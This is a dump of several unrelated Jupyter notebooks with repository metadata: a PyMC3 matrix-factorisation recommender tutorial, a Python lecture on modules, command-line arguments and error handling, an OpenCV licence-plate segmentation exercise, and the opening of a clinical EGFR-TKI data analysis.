"We have some interesting results here. As expected, our MCMC sampler provides lower error on the training set. However, it seems it does so at the cost of overfitting the data. This results in a decrease in test RMSE as compared to the MAP, even though it is still much better than our best baseline. So why might this be the case? Recall that we used point estimates for our precision paremeters $\\alpha_U$ and $\\alpha_V$ and we chose a fixed precision $\\alpha$. It is quite likely that by doing this, we constrained our posterior in a way that biased it towards the training data. In reality, the variance in the user ratings and the movie ratings is unlikely to be equal to the means of sample variances we used. Also, the most reasonable observation precision $\\alpha$ is likely different as well.",
"_____no_output_____"
],
[
"### Summary of Results\n\nLet's summarize our results.",
"_____no_output_____"
]
],
[
[
"size = 100 # RMSE doesn't really change after 100th sample anyway.\nall_results = pd.DataFrame(\n {\n \"uniform random\": np.repeat(baselines[\"ur\"], size),\n \"global means\": np.repeat(baselines[\"gm\"], size),\n \"mean of means\": np.repeat(baselines[\"mom\"], size),\n \"PMF MAP\": np.repeat(pmf_map_rmse, size),\n \"PMF MCMC\": results[\"running-test\"][:size],\n }\n)\nfig, ax = plt.subplots(figsize=(10, 5))\nall_results.plot(kind=\"line\", grid=False, ax=ax, title=\"RMSE for all methods\")\nax.set_xlabel(\"Number of Samples\")\nax.set_ylabel(\"RMSE\");",
"_____no_output_____"
]
],
[
[
"## Summary\n\nWe set out to predict user preferences for unseen movies. First we discussed the intuitive notion behind the user-user and item-item neighborhood approaches to collaborative filtering. Then we formalized our intuitions. With a firm understanding of our problem context, we moved on to exploring our subset of the Movielens data. After discovering some general patterns, we defined three baseline methods: uniform random, global mean, and mean of means. With the goal of besting our baseline methods, we implemented the basic version of Probabilistic Matrix Factorization (PMF) using `pymc3`.\n\nOur results demonstrate that the mean of means method is our best baseline on our prediction task. As expected, we are able to obtain a significant decrease in RMSE using the PMF MAP estimate obtained via Powell optimization. We illustrated one way to monitor convergence of an MCMC sampler with a high-dimensionality sampling space using the Frobenius norms of the sampled variables. The traceplots using this method seem to indicate that our sampler converged to the posterior. Results using this posterior showed that attempting to improve the MAP estimation using MCMC sampling actually overfit the training data and increased test RMSE. This was likely caused by the constraining of the posterior via fixed precision parameters $\\alpha$, $\\alpha_U$, and $\\alpha_V$.\n\nAs a followup to this analysis, it would be interesting to also implement the logistic and constrained versions of PMF. We expect both models to outperform the basic PMF model. We could also implement the [fully Bayesian version of PMF](https://www.cs.toronto.edu/~amnih/papers/bpmf.pdf) (BPMF), which places hyperpriors on the model parameters to automatically learn ideal mean and precision parameters for $U$ and $V$. This would likely resolve the issue we faced in this analysis. We would expect BPMF to improve upon the MAP estimation produced here by learning more suitable hyperparameters and parameters. For a basic (but working!) implementation of BPMF in `pymc3`, see [this gist](https://gist.github.com/macks22/00a17b1d374dfc267a9a).\n\nIf you made it this far, then congratulations! You now have some idea of how to build a basic recommender system. These same ideas and methods can be used on many different recommendation tasks. Items can be movies, products, advertisements, courses, or even other people. Any time you can build yourself a user-item matrix with user preferences in the cells, you can use these types of collaborative filtering algorithms to predict the missing values. If you want to learn more about recommender systems, the first reference is a good place to start.",
"_____no_output_____"
],
[
"## References\n\n1. Y. Koren, R. Bell, and C. Volinsky, “Matrix Factorization Techniques for Recommender Systems,” Computer, vol. 42, no. 8, pp. 30–37, Aug. 2009.\n2. K. Goldberg, T. Roeder, D. Gupta, and C. Perkins, “Eigentaste: A constant time collaborative filtering algorithm,” Information Retrieval, vol. 4, no. 2, pp. 133–151, 2001.\n3. A. Mnih and R. Salakhutdinov, “Probabilistic matrix factorization,” in Advances in neural information processing systems, 2007, pp. 1257–1264.\n4. S. J. Nowlan and G. E. Hinton, “Simplifying Neural Networks by Soft Weight-sharing,” Neural Comput., vol. 4, no. 4, pp. 473–493, Jul. 1992.\n5. R. Salakhutdinov and A. Mnih, “Bayesian Probabilistic Matrix Factorization Using Markov Chain Monte Carlo,” in Proceedings of the 25th International Conference on Machine Learning, New York, NY, USA, 2008, pp. 880–887.\n\n\nThe model discussed in this analysis was developed by Ruslan Salakhutdinov and Andriy Mnih. Code and supporting text are the original work of [Mack Sweeney](https://www.linkedin.com/in/macksweeney) with changes made to adapt the code and text for the Movielens dataset by Colin Carroll and Rob Zinkov.\n\n\n",
"_____no_output_____"
]
],
[
[
"%load_ext watermark\n%watermark -n -u -v -iv -w",
"Last updated: Sun Feb 07 2021\n\nPython implementation: CPython\nPython version : 3.8.6\nIPython version : 7.20.0\n\nscipy : 1.6.0\nnumpy : 1.20.0\npandas : 1.2.1\nlogging : 0.5.1.2\npymc3 : 3.11.0\ntheano : 1.1.2\nmatplotlib: None\n\nWatermark: 2.1.0\n\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
]
] |
cb2b83c66c4a5bf6075d4d94e36a5b4cce7b1ead | 18,093 | ipynb | Jupyter Notebook | lecture_08_modules_input_errors.ipynb | CUBoulder-ASTR2600/lectures | 41740e09d4388b94dadc1ce2b017f5dac538ee30 | [
"0BSD"
] | null | null | null | lecture_08_modules_input_errors.ipynb | CUBoulder-ASTR2600/lectures | 41740e09d4388b94dadc1ce2b017f5dac538ee30 | [
"0BSD"
] | null | null | null | lecture_08_modules_input_errors.ipynb | CUBoulder-ASTR2600/lectures | 41740e09d4388b94dadc1ce2b017f5dac538ee30 | [
"0BSD"
] | null | null | null | 19.926211 | 130 | 0.508152 | [
[
[
"# Making your own modules",
"_____no_output_____"
],
[
"If a function will be used in multiple programs, it should be written \nas a module instead. \n\nAll one has to do is put the functions in a program_name.py\nfile and import it (the whole thing) or the functions, then \nuse them in the main program.\n\nExactly the same way how you import and use other libraries.\n\n## Example\nGiven mass and velocity, this function calculates the kinetic energy of a particle\nin meters/kilograms/seconds (mks) units.",
"_____no_output_____"
],
[
"$$E_k = \\frac{1}{2} \\cdot mv^2$$",
"_____no_output_____"
]
],
[
[
"def eKinetic(mass, velocity):\n return 0.5 * mass * velocity**2",
"_____no_output_____"
],
[
"eKinetic(1, 10)",
"_____no_output_____"
]
],
[
[
"#### Q. What will the output be?",
"_____no_output_____"
],
[
"The following function calculates the x, y, and z accelerations \nof a particle resulting from forces acting upon it given its mass.\n\nAll units are SI.",
"_____no_output_____"
],
[
"$a=\\frac{F}{m}$ rearranged from $F=ma$\n\n> Note: These techniques are also related to some of the tasks in the homework and the final project.",
"_____no_output_____"
]
],
[
[
"def acceleration(xForce, yForce, zForce, mass):\n xAccel = float(xForce) / float(mass)\n yAccel = float(yForce) / float(mass)\n zAccel = float(zForce) / float(mass)\n \n return (xAccel, yAccel, zAccel)",
"_____no_output_____"
]
],
[
[
"#### Q. What will this do?",
"_____no_output_____"
]
],
[
[
"acceleration(10, 20, 30, 5)",
"_____no_output_____"
]
],
[
[
"I put eKinetic and acceleration in a module called kinematics.py using a text editor.\n\nNow, try the module in an IPython session:",
"_____no_output_____"
]
],
[
[
"# remember that this line overwrites the local definition\n# because it has the same name as above!\n\nfrom kinematics import eKinetic, acceleration\n\nmass = 100\nvelocity = 10\nxForce = 10\nyForce = 20\nzForce = 30\n\nkEnergy = eKinetic(mass, velocity)\nmAccel = acceleration(xForce, yForce, zForce, mass)\n\nkEnergy, mAccel",
"_____no_output_____"
]
],
[
[
"### Providing program arguments on the command-line",
"_____no_output_____"
],
[
"Input is often supplied to Python scripts via the command line.\n\nPut another way, \"arguments\" are provided to scripts.\n\nHere are some Linux examples:\n\n```bash\necho $PATH\n``` \n\necho is the command, `$PATH` is an argument. Or, \n\n```bash\ncd some_directory\n```\n\ncd is the commmand, `some_directory` is an argument.\n\n```bash\n cd\n```\n\nNo arguments here -- default behavior: cd $HOME",
"_____no_output_____"
],
[
"We can do the same sort of thing in Python using the sys module. \nThe following script (lecture_08_wavetofreq.py) converts a \nuser-supplied wavelength (in Angstroms) to frequency (in Hz).\n\nI show you here how to quickly load an existing script into the notebook, using %load:",
"_____no_output_____"
]
],
[
[
"# %load lecture_08_wavetofreq.py\n#!/usr/bin/env python\n\nimport sys\nwave = float(sys.argv[1])\nfreq = 3.0e8 / (wave / 1e10)\nprint('frequency (Hz) = %e' % freq)\n",
"_____no_output_____"
],
[
"import sys # \"sys\" is short for \"system\"\nwave = float(sys.argv[1])\nfreq = 3.0e8 / (wave / 1e10) # pass wavelength in Angstroms\nprint('frequency (Hz) = %e' % freq)\n",
"_____no_output_____"
],
[
"sys.argv",
"_____no_output_____"
]
],
[
[
"sys.argv contains a list of the command line arguments to the program. \n\nsys.argv[0] is always the name of the program.",
"_____no_output_____"
],
[
"To run it in a Linux terminal (must be in same directory as file):\n\n```bash\npython lecture_08_wavetofreq.py 5000\n```\n\nTo run it within here or a simple ipython terminal (file must be in same directory that you \nlaunched the notebook from):",
"_____no_output_____"
]
],
[
[
"%run lecture_08_wavetofreq.py 5000",
"_____no_output_____"
]
],
[
[
"#### Q. What if there is more than one command-line input required?",
"_____no_output_____"
]
],
[
[
"\n\n\n\n\n\n\n\n\n\n\n\n\n",
"_____no_output_____"
],
[
"Consider the following script:",
"_____no_output_____"
]
],
[
[
"import sys\n\nfor i, element in enumerate(sys.argv):\n print(\"Argument #{} = {}\".format(i, element))",
"_____no_output_____"
]
],
[
[
"I have it saved in a file called lecture_08_systest.py",
"_____no_output_____"
]
],
[
[
"#### Q. What will the following command do in a Linux session?",
"_____no_output_____"
]
],
[
[
"python lecture_08_systest.py 'hello' 2 4 6",
"_____no_output_____"
]
],
[
[
"You will practice with sys in the tutorial!",
"_____no_output_____"
]
],
[
[
"%run lecture_08_systest.py 'hello' 2 4 6",
"_____no_output_____"
]
],
[
[
"### Error Handling",
"_____no_output_____"
],
[
"The script lecture_08_wavetofreq.py expects an argument, the \nwavelength in Angstroms:\n",
"_____no_output_____"
]
],
[
[
"# lecture_08_wavetofreq.py\n\nimport sys\nwave = float(sys.argv[1]) # Attempting to use the argument here.\nfreq = 3.0e8 / (wave / 1e10) # Convert wavelength in Angstroms to frequency in Hz\nprint('frequency (Hz) = %e' % freq)",
"_____no_output_____"
]
],
[
[
"If we forget to supply that argument, we get an error message:",
"_____no_output_____"
]
],
[
[
"%run lecture_08_wavetofreq.py",
"_____no_output_____"
]
],
[
[
"It tells us what file and what line where the error occured and \nthe type of error (IndexError)",
"_____no_output_____"
],
[
"#### Q. What is a simple way we could tell if the user forgot the argument and exit the program gracefully without a crash?",
"_____no_output_____"
]
],
[
[
"Hint: Where are the arguments held again?",
"_____no_output_____"
],
[
"\n\n\n\n\n\n\n\n\n\n\n\n\n\n",
"_____no_output_____"
],
[
"We could test the length of sys.argv and if it is < 2; if so, we could \nabort with an error message (this script is saved in \nlecture_08_wavetofreq2.py):",
"_____no_output_____"
]
],
[
[
"# lecture_08_wavetofreq2.py\n\nimport sys\n\nif len(sys.argv) < 2:\n print('Enter the wavelength in Angstroms on the command line.')\n sys.exit(1) # Exits and 1 indicates failure\n # sys.exit() or sys.exit(0) is used to indicate success\n\nwave = float(sys.argv[1])\nfreq = 3.0e8 / (wave / 1e10)\nprint('frequency (Hz) = %e' % freq )",
"_____no_output_____"
]
],
[
[
"#### Q. What will the following yield?",
"_____no_output_____"
]
],
[
[
"%run lecture_08_wavetofreq2.py 5000",
"_____no_output_____"
]
],
[
[
"#### Q. And this?",
"_____no_output_____"
]
],
[
[
"%run lecture_08_wavetofreq2.py",
"_____no_output_____"
],
[
"%tb",
"_____no_output_____"
]
],
[
[
"### Exception Handling",
"_____no_output_____"
],
[
"Alternatively, the program can try to run the code and \nif errors are found, jump to statements that handle \nthe error as desired.\n\nThis is done with two new reserved words, \"try\" and \"except\", \nwhich are used in a similar way as \"if\" and \"elif\". ",
"_____no_output_____"
],
[
"This is the script lecture_08_wavetofreq3.py:",
"_____no_output_____"
]
],
[
[
"# lecture_08_wavetofreq3.py\n\nimport sys\n\ntry:\n wave = float(sys.argv[1])\nexcept:\n print('Enter the wavelength in Angstroms on the command line.')\n sys.exit(1)\n\nfreq = 3.0e8 / (wave / 1e10)\nprint('frequency (Hz) = %e' % freq)",
"_____no_output_____"
]
],
[
[
"If the command in the try block produces an error, the except block \nis executed.",
"_____no_output_____"
],
[
"#### Q. What does \"wave = float(sys.argv[1])\" attempt to do?",
"_____no_output_____"
],
[
"#### Q. What if we try to do the following:",
"_____no_output_____"
]
],
[
[
"%run lecture_08_wavetofreq3.py x",
"_____no_output_____"
],
[
"%tb",
"_____no_output_____"
]
],
[
[
"> The program could also fail if something other than a number is given \non the command line!",
"_____no_output_____"
],
[
"That produces a ValueError, not an IndexError.\n\nWe can fix this with two separate exceptions appropriate for the two \npossible errors (this is similar to if/elif/elif):",
"_____no_output_____"
]
],
[
[
"# lecture_08_wavetofreq4.py\n\nimport sys\n\ntry:\n wave = float(sys.argv[1])\n \nexcept IndexError:\n print('Enter the wavelength in Angstroms on the command line.')\n sys.exit(1)\n\nexcept ValueError as error:\n #print 'The wavelength must be a number'\\\n #' not %s.' % type(sys.argv[1])\n print(\"The error is:\", error)\n sys.exit(2)\n\nfreq = 3.0e8 / (wave / 1e10)\nprint('frequency (Hz) = %e' % freq)",
"_____no_output_____"
]
],
[
[
"This script is saved in the file lecture_08_wavetofreq4.py",
"_____no_output_____"
]
],
[
[
"#### Q. What do these yield?",
"_____no_output_____"
]
],
[
[
"%run lecture_08_wavetofreq4.py 5000",
"_____no_output_____"
],
[
"%run lecture_08_wavetofreq4.py",
"_____no_output_____"
],
[
"%run lecture_08_wavetofreq4.py x",
"_____no_output_____"
]
],
[
[
"### Common error types",
"_____no_output_____"
]
],
[
[
"IndexError for indices out of range:",
"_____no_output_____"
]
],
[
[
"data = range(9)\ndata[9]",
"_____no_output_____"
]
],
[
[
"Q. Why does it fail?\n\n\n",
"_____no_output_____"
],
[
"Converting a str to a float gives a ValueError:",
"_____no_output_____"
]
],
[
[
"y = float('x')",
"_____no_output_____"
],
[
"y = float('3')\ny",
"_____no_output_____"
]
],
[
[
"Using an uninitialized variable gives a NameError:",
"_____no_output_____"
]
],
[
[
"x",
"_____no_output_____"
]
],
[
[
"Division by zero raises a ZeroDivisionError exception:",
"_____no_output_____"
]
],
[
[
"4.0/0",
"_____no_output_____"
]
],
[
[
"Syntax errors lead to SyntaxErrors!",
"_____no_output_____"
]
],
[
[
"iff 2 > 1:\n print('it is.')",
"_____no_output_____"
]
],
[
[
"Multiplying a string by a float yields a TypeError:",
"_____no_output_____"
]
],
[
[
"10.0 * 'blah'",
"_____no_output_____"
]
],
[
[
"#### Q. But what will this do?",
"_____no_output_____"
]
],
[
[
"5 * 'blah '",
"_____no_output_____"
]
],
[
[
"Nice flowchart on error handling (http://i.imgur.com/WRuJV6r.png):\n\n",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"raw",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"raw",
"code",
"raw",
"markdown",
"raw",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"raw",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"raw",
"markdown",
"code",
"markdown",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"raw",
"raw"
],
[
"code"
],
[
"raw"
],
[
"markdown"
],
[
"raw"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"raw",
"raw",
"raw"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"raw"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"raw"
],
[
"code"
],
[
"raw",
"raw"
],
[
"code",
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
cb2b8aa4d583fb1ecb384bc88294d9cc191f065b | 92,159 | ipynb | Jupyter Notebook | research/code/pytorch_lstm_neuralnetwork.ipynb | fuzzzyy17/continuous-visual-perception | 91b125be1d4800c7f8167724806ba246a58f4895 | [
"MIT"
] | null | null | null | research/code/pytorch_lstm_neuralnetwork.ipynb | fuzzzyy17/continuous-visual-perception | 91b125be1d4800c7f8167724806ba246a58f4895 | [
"MIT"
] | null | null | null | research/code/pytorch_lstm_neuralnetwork.ipynb | fuzzzyy17/continuous-visual-perception | 91b125be1d4800c7f8167724806ba246a58f4895 | [
"MIT"
] | null | null | null | 74.142397 | 1,310 | 0.680921 | [
[
[
"empty"
]
]
] | [
"empty"
] | [
[
"empty"
]
] |
cb2b8fabe4ef5b07dc632a712ff5975161b3c865 | 67,378 | ipynb | Jupyter Notebook | Colab_Class/binarySegmentation.ipynb | josearangos/PDI | 0339aa4dbfce83d91138ea1ffaf6770f0392c2fb | [
"ADSL"
] | 1 | 2020-02-22T00:45:07.000Z | 2020-02-22T00:45:07.000Z | Colab_Class/binarySegmentation.ipynb | josearangos/PDI | 0339aa4dbfce83d91138ea1ffaf6770f0392c2fb | [
"ADSL"
] | null | null | null | Colab_Class/binarySegmentation.ipynb | josearangos/PDI | 0339aa4dbfce83d91138ea1ffaf6770f0392c2fb | [
"ADSL"
] | null | null | null | 193.614943 | 19,082 | 0.869379 | [
[
[
"<a href=\"https://colab.research.google.com/github/josearangos/PDI/blob/Colab/Colab_Class/binarySegmentation.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
]
],
[
[
"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom google.colab.patches import cv2_imshow",
"_____no_output_____"
]
],
[
[
"## Segmentación binaria\n\n\n### Actividad\n\nEn esta clase se analiza una imagen binarizada de un carro(entrada) en donde se resalta la placa y se busca sacar solo la placa\n\n",
"_____no_output_____"
]
],
[
[
"! wget https://github.com/josearangos/PDI/raw/Colab/Resources/Image/placa_bina.png\n! wget https://github.com/josearangos/PDI/raw/Colab/Resources/Image/carro_shape.jpg",
"--2020-04-02 23:57:55-- https://github.com/josearangos/PDI/raw/Colab/Resources/Image/placa_bina.png\nResolving github.com (github.com)... 140.82.113.4\nConnecting to github.com (github.com)|140.82.113.4|:443... connected.\nHTTP request sent, awaiting response... 302 Found\nLocation: https://raw.githubusercontent.com/josearangos/PDI/Colab/Resources/Image/placa_bina.png [following]\n--2020-04-02 23:57:55-- https://raw.githubusercontent.com/josearangos/PDI/Colab/Resources/Image/placa_bina.png\nResolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.0.133, 151.101.64.133, 151.101.128.133, ...\nConnecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.0.133|:443... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 6484 (6.3K) [image/png]\nSaving to: ‘placa_bina.png’\n\n\rplaca_bina.png 0%[ ] 0 --.-KB/s \rplaca_bina.png 100%[===================>] 6.33K --.-KB/s in 0s \n\n2020-04-02 23:57:55 (103 MB/s) - ‘placa_bina.png’ saved [6484/6484]\n\n--2020-04-02 23:57:56-- https://github.com/josearangos/PDI/raw/Colab/Resources/Image/carro_shape.jpg\nResolving github.com (github.com)... 140.82.113.4\nConnecting to github.com (github.com)|140.82.113.4|:443... connected.\nHTTP request sent, awaiting response... 302 Found\nLocation: https://raw.githubusercontent.com/josearangos/PDI/Colab/Resources/Image/carro_shape.jpg [following]\n--2020-04-02 23:57:56-- https://raw.githubusercontent.com/josearangos/PDI/Colab/Resources/Image/carro_shape.jpg\nResolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.0.133, 151.101.64.133, 151.101.128.133, ...\nConnecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.0.133|:443... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 142567 (139K) [image/jpeg]\nSaving to: ‘carro_shape.jpg’\n\ncarro_shape.jpg 100%[===================>] 139.23K --.-KB/s in 0.04s \n\n2020-04-02 23:57:56 (3.64 MB/s) - ‘carro_shape.jpg’ saved [142567/142567]\n\n"
]
],
[
[
"## Leemos la imagen",
"_____no_output_____"
]
],
[
[
"a = cv2.imread('placa_bina.png',0) #Leemos nuestra imagen de dos dimensiones\nb = a.copy() #Creamos una copia\nfil,col = b.shape #Guardamos sus dimensiones en variables separadas\ncv2_imshow(b)",
"_____no_output_____"
]
],
[
[
"## Aplicamos la mascara",
"_____no_output_____"
]
],
[
[
"a = cv2.threshold(a,127,255,cv2.THRESH_BINARY)[1] #Convertimos nuestra imagen para hacerla de una sola dimensión para poder aplicar la función de conectividad con la cual etiquetaremos las secciones que están interconectadas\nret, labels = cv2.connectedComponents(a,4) #Guardamos el número de etiquetas y una matriz que contiene el valor de cada pixel (La etiqueta que le corresponde)\n#MAP COMPONENTS TO HUE VAL (formula to hsv) Con esta formula tomamos la matriz de etiquetas resultantes y creamos una imagen con pseudo colores de nuestra imagen original pero con los pixeles que comparten etiqueta del mismo color\nlabel_hue = np.uint8(179*labels/np.max(labels))\nblank_ch = 255*np.ones_like(label_hue)\nlabeled_a = cv2.merge([label_hue, blank_ch, blank_ch])\n#cvt to bgr for display\nlabeled_a = cv2.cvtColor(labeled_a, cv2.COLOR_HSV2BGR)\n#Convert background to black\nlabeled_a[label_hue==0] = 255 #Convertimos en cero los pixeles que en la matriz de etiquetas son cero\ncv2_imshow(labeled_a)\n",
"_____no_output_____"
]
],
[
[
"## Graficamos la distribución de pixeles",
"_____no_output_____"
]
],
[
[
"#Con las dos líneas de código anteriores hacemos cero los valores no etiquetados para mostrarlos en negro\ntotal = [] #Creamos un arreglo para guardar el numero de pixeles que comparten cada etiqueta por etiqueta\nvalor = 0 #Variable que almacenará el número de pixeles que comparten una etiqueta\n#Con las dos líneas de código anteriores hacemos cero los valores no etiquetados para mostrarlos en negro\nfor i in range (1,ret): #Con este ciclo for guardamos el número de pixeles que tiene cada etiqueta y lo guardamos en una lista\n valor = i\n c = b*0\n c[labels == i] = 1\n suma = np.sum(c)\n total = [(valor,suma)] + total\nx_list = [l[0] for l in total] #Extraemos de la lista el valor de cada etiqueta\ny_list = [l[1] for l in total] #Extraemos el valor de la suma de cada etiqueta\n\ny_list = np.uint32(y_list) #Convertimos los valores obtenidos en la suma de pixeles de la etiqueta a 32 bits\nplt.scatter(x_list,y_list) # Graficamos los calor x = etiquetas y = valor suma pixeles etiquera\nplt.show() #Mostramos la gráfica",
"_____no_output_____"
],
[
"\nd = cv2.imread('carro_shape.jpg',1) #Leemos la imagen que extraímos en formato s de hsv\nmx = np.max(total) #Buscamos la etiqueta que tienen el mayor número de pixeles interconectados\nind = []\nind = np.where(mx==total) # Guardamos en un arreglo cada pixel que tenga el valor de mx\nc = b*0 # Creamos una matriz vacia del tamaño de b (La imagen que tenemos de carro en 3 capas)\nc[labels == 262] = 255 #Cada pixel que tenga el valor de la etiqueta con más pixeles que la conforman lo hacemos 255 (negro)\ncv2_imshow(c) #Mostramos la imagen obtenida en la linea de código anterior\nx,y = np.where(c>0) #Guardamos las coordenadas de cada pixel en negro (255) de C\nfm = np.min(x) #Guardamos su valor mínimo en x\nfx = np.max(x) #Guardamos su valor máximo en x\ncm = np.min(y) #Guardamos su valor mínimo en y\ncx = np.max(y) #Guardamos su valor máximo en y\nd = d[fm:fx,cm:cx,:] #Tomamos de la imagen origianl el area encerrada por los valores obtenido en las cuatro líneas de código anterior\n",
"_____no_output_____"
]
],
[
[
"## Resultado placa",
"_____no_output_____"
]
],
[
[
"cv2_imshow(d) #Mostramos la imagen obtenida",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb2bae0f9c97f0ad072ed313ddf6d45741f3e625 | 152,826 | ipynb | Jupyter Notebook | code/ANN_analysis-release.ipynb | GuanRunwei/A-Clinical-Decision-Support-System-of-EGFR-TKIs | 9faa317674e6ab181d7132003d9f5548471a1003 | [
"Apache-2.0"
] | null | null | null | code/ANN_analysis-release.ipynb | GuanRunwei/A-Clinical-Decision-Support-System-of-EGFR-TKIs | 9faa317674e6ab181d7132003d9f5548471a1003 | [
"Apache-2.0"
] | null | null | null | code/ANN_analysis-release.ipynb | GuanRunwei/A-Clinical-Decision-Support-System-of-EGFR-TKIs | 9faa317674e6ab181d7132003d9f5548471a1003 | [
"Apache-2.0"
] | null | null | null | 101.884 | 34,368 | 0.817616 | [
[
[
"import torch\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import svm\nfrom xgboost import XGBClassifier\nfrom sklearn.metrics import recall_score\nfrom joblib import dump, load\nfrom sklearn.metrics import roc_curve, auc\nimport matplotlib.pyplot as plt\n\nfrom sklearn.externals import joblib",
"E:\\Anaconda\\Software\\lib\\site-packages\\sklearn\\externals\\joblib\\__init__.py:15: DeprecationWarning: sklearn.externals.joblib is deprecated in 0.21 and will be removed in 0.23. Please import this functionality directly from joblib, which can be installed with: pip install joblib. If this warning is raised when loading pickled models, you may need to re-serialize those models with scikit-learn 0.21+.\n warnings.warn(msg, category=DeprecationWarning)\n"
],
[
"device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nprint(torch.cuda.is_available())",
"True\n"
],
[
"new_file = 'newnew.xlsx'",
"_____no_output_____"
],
[
"new_dataframe = pd.read_excel(new_file, sheet_name=0)\nnew_dataframe1 = pd.read_excel(new_file, sheet_name=2).iloc[:, range(16)]\nnew_dataframe2 = pd.read_excel(new_file, sheet_name=2).iloc[:, range(17,31)]",
"_____no_output_____"
],
[
"# Dataset1\nnew_dataframe.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 158 entries, 0 to 157\nData columns (total 12 columns):\n性别 158 non-null int64\n年龄 158 non-null int64\n吸烟 158 non-null int64\n部位 158 non-null int64\n原发灶大小 158 non-null int64\n骨转移 158 non-null int64\n脑转移 158 non-null int64\n肝转 158 non-null int64\n肺内转移 158 non-null int64\n胸膜转移 158 non-null int64\n治疗方案 158 non-null int64\n疗效差0差1好/9个月 158 non-null int64\ndtypes: int64(12)\nmemory usage: 14.9 KB\n"
],
[
"# Dataset2\nnew_dataframe1.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 158 entries, 0 to 157\nData columns (total 16 columns):\n性别 158 non-null int64\n年龄 158 non-null int64\n吸烟 158 non-null int64\n部位 158 non-null int64\n原发灶大小 158 non-null int64\n骨转移 158 non-null int64\n脑转移 158 non-null int64\n肝转 158 non-null int64\n肺内转移 158 non-null int64\n胸膜转移 158 non-null int64\n治疗方案 158 non-null int64\n突变情况123 158 non-null int64\nTP53 158 non-null int64\nrb1 158 non-null int64\npik3ca 158 non-null int64\n疗效差1差2好/9个月 158 non-null int64\ndtypes: int64(16)\nmemory usage: 19.9 KB\n"
],
[
"# Dataset3\nnew_dataframe2.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 158 entries, 0 to 157\nData columns (total 14 columns):\n性别.1 158 non-null int64\n年龄.1 158 non-null int64\n吸烟.1 158 non-null int64\n部位.1 158 non-null int64\n原发灶大小.1 158 non-null int64\n骨转移.1 158 non-null int64\n脑转移.1 158 non-null int64\n肝转.1 158 non-null int64\n肺内转移.1 158 non-null int64\n胸膜转移.1 158 non-null int64\n治疗方案.1 158 non-null int64\n突变情况123.1 158 non-null int64\nN 158 non-null int64\n疗效差1差2好/9个月.1 158 non-null int64\ndtypes: int64(14)\nmemory usage: 17.4 KB\n"
]
],
[
[
"## Dataset for outside validation",
"_____no_output_____"
]
],
[
[
